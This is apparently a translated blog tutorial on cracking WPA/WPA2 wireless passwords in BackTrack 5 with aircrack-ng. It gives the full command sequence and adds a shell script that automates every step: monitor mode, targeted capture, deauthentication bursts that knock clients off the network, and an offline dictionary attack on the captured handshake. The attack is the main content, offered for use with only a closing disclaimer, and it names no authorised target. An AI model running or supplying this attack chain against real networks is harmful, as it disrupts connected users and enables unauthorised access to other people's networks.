Yesterday we published the minidwep-gtk tutorial on cracking WEP wireless passwords in BackTrack 5 (BT5), which covered the simple WEP method. Today I will show how to crack a WPA/WPA2 wireless password in BT5.
Prerequisites: you have installed, or can boot, the BT5 GNOME 32-bit image from your hard disk. See the earlier articles on BackTrack 5 hard-disk booting and BT5 hard-disk installation.
WPA/WPA2 is said to be hard to crack, and that is true: success depends not only on technique but also on luck. WPA/WPA2-PSK is attacked offline, by running a dictionary against a captured four-way handshake, so a strong wordlist is essential, and even with a good one the password is often not found. Enough preamble; here is the method:
1. Open the wicd Network Manager in BT5 (Applications > Internet). Pick an AP with a strong signal (the stronger, the easier to work with). Open its Properties, then the advanced properties inside, and note the AP's MAC address (BSSID) and channel.
2. Run ifconfig (or iwconfig, which lists only wireless interfaces) to find the name of your wireless card, usually wlan0 or wifi0, and substitute your actual interface name in the commands below.
3. Enable monitor mode on the wireless card:
airmon-ng start wlan0 6
Note: wlan0 is the name of your wireless device and 6 is the channel to start on. The channel argument does not matter much here, because airodump-ng will lock the monitor interface to the target's channel in the next step. The new monitor interface is normally called mon0.
airmon-ng may warn that certain processes (xxxx) could interfere and list their PIDs. Kill each listed PID with kill <PID>, then rerun the command until no warning is shown.
4. With the target chosen, point BT5 at that AP alone and start capturing:
airodump-ng -w nenew -c <channel> --bssid <AP MAC> mon0
Here -w nenew is the capture file prefix (airodump-ng writes nenew-01.cap), -c is the channel noted in step 1 (the example used channel 4), and --bssid restricts the capture to the target AP. Once running, you should see the AP in the upper part of the display and its associated clients (stations) listed below it (screenshot omitted).
5. From that output, note the MAC addresses of the clients (the example shows four) and choose one, preferably an active one that is exchanging frames. Open a second terminal (leave the first one running; you will need it later) and send a deauthentication burst:
aireplay-ng -0 10 -a <AP MAC> -c <client MAC> mon0
Here -0 10 sends ten deauth frames, -a is the AP's MAC and -c the client's MAC. Watch the first terminal: when the client reconnects, airodump-ng shows "WPA handshake: <AP MAC>" in the top-right corner. If it appears, congratulations, you are not far from success. If it does not, repeat the aireplay-ng command (or try another client) until the handshake is captured.
6. Crack the handshake captured in the BT5 capture file:
aircrack-ng -w password.txt -b <AP MAC> nenew-01.cap
password.txt is the dictionary file, which you must have prepared in advance; there are many wordlists online, and a search will turn them up. The experts here will also release their own dictionary files for download, so stay tuned. Note that aircrack-ng only reports KEY FOUND if the passphrase is actually in the dictionary, and that WPA passphrases are 8 to 63 characters, so candidates outside that range are skipped. (Final result screenshot omitted.)
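As an added example (not part of the original tutorial), here is a small POSIX shell script that strings steps 3 to 6 together. It assumes the aircrack-ng suite as shipped with BT5, root privileges, and that the interface, channel, AP MAC, client MAC and dictionary path come from steps 1, 2 and 5; the airmon-ng and aircrack-ng output formats it parses ("monitor mode enabled on mon0", the PID column of airmon-ng check, "WPA (1 handshake)") are assumptions about that era's tools, and nenew is kept as the capture prefix.

```shell
#!/bin/sh
# Added example, not part of the original tutorial: one shell wrapper for
# steps 3 to 6 (airmon-ng -> airodump-ng -> aireplay-ng deauth -> aircrack-ng).
# Assumes the aircrack-ng suite is installed, you are root, and the AP/client
# MACs, channel and dictionary were chosen as in steps 1, 2 and 5. The
# airmon-ng and aircrack-ng output formats parsed below are assumed from the
# aircrack-ng 1.1 era that BT5 shipped.
#
# Usage: sh wpa_capture.sh wlan0 <channel> <AP MAC> <client MAC> password.txt

# A MAC must look like 00:11:22:aa:bb:cc (six hex pairs, either case).
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# The tutorial works on 2.4 GHz, so accept channels 1-14 only.
valid_channel() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# Read aircrack-ng's network summary on stdin and print how many handshakes it
# saw, e.g. "WPA (1 handshake)" -> 1. Prints 0 if there is no WPA line.
handshake_count() {
    n=$(sed -n 's/.*WPA (\([0-9]*\) handshake).*/\1/p' | head -n 1)
    printf '%s\n' "${n:-0}"
}

capture_and_crack() {   # iface channel ap_mac client_mac dictionary
    iface=$1 chan=$2 ap=$3 client=$4 dict=$5
    prefix=nenew         # same prefix as the tutorial: airodump-ng writes nenew-01.cap

    valid_mac "$ap"       || { echo "bad AP MAC: $ap" >&2; return 1; }
    valid_mac "$client"   || { echo "bad client MAC: $client" >&2; return 1; }
    valid_channel "$chan" || { echo "bad channel: $chan" >&2; return 1; }
    [ -r "$dict" ]        || { echo "dictionary not readable: $dict" >&2; return 1; }

    # Step 3: kill the processes airmon-ng says may interfere (first column is
    # the PID), then enable monitor mode and read the new interface name.
    for pid in $(airmon-ng check | awk '/^[0-9]+[ \t]/ { print $1 }'); do
        kill "$pid" 2>/dev/null
    done
    monif=$(airmon-ng start "$iface" "$chan" \
            | sed -n 's/.*monitor mode enabled on \([A-Za-z0-9]*\)).*/\1/p' | head -n 1)
    monif=${monif:-mon0}   # BT5's airmon-ng normally creates mon0

    # Step 4: capture only the target AP, locked to its channel, in the background.
    rm -f "$prefix"-*.cap
    airodump-ng -w "$prefix" -c "$chan" --bssid "$ap" "$monif" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5

    # Step 5: deauth the client so it re-associates, then ask aircrack-ng whether
    # the capture now holds a four-way handshake. Retry, as the tutorial does.
    tries=0 n=0
    while [ "$tries" -lt 10 ] && [ "$n" -lt 1 ]; do
        aireplay-ng -0 10 -a "$ap" -c "$client" "$monif" >/dev/null 2>&1
        sleep 10
        n=$(aircrack-ng "$prefix"-01.cap 2>/dev/null </dev/null | handshake_count)
        tries=$((tries + 1))
    done
    kill "$dump_pid" 2>/dev/null

    if [ "$n" -lt 1 ]; then
        echo "no WPA handshake captured after $tries deauth rounds" >&2
        return 2
    fi

    # Step 6: offline dictionary attack against the captured handshake.
    aircrack-ng -w "$dict" -b "$ap" "$prefix"-01.cap
}

if [ $# -eq 5 ]; then
    capture_and_crack "$@"
fi
```

Run it as root with the five arguments. It kills the processes airmon-ng flags (which includes wicd or NetworkManager, so your normal connection drops), retries the deauth up to ten times, and only launches aircrack-ng once a handshake is present in nenew-01.cap. If it reports no handshake, pick a different, active client as step 5 suggests.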
This article is for technical discussion only and must not be used for illegal purposes; otherwise you alone bear the consequences.